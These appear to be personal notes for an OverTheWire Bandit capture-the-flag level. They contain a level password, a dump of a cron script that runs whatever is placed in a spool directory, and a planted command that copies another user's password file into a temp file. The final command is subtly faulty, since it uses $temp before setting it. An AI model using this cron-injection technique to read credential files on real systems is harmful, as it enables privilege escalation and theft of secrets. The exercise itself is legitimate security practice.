jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

cat /etc/cron.d/cronjob_bandit24
# -> /usr/bin/cronjob_bandit24.sh

cat /usr/bin/cronjob_bandit24.sh
# shows ->
# #!/bin/bash
# 
# myname=$(whoami)
# 
# cd /var/spool/$myname
# echo "Executing and deleting all scripts in /var/spool/$myname:"
# for i in * .*;
# do
#     if [ "$i" != "." -a "$i" != ".." ];
#     then
# 	echo "Handling $i"
# 	timeout -s 9 60 ./$i
# 	rm -f ./$i
#     fi
# done


command='temp=$(mktemp -d -t stuXXXXXX); cat /etc/bandit_pass/bandit24 > $temp/bandit24'
echo $command > /var/spool/$temp
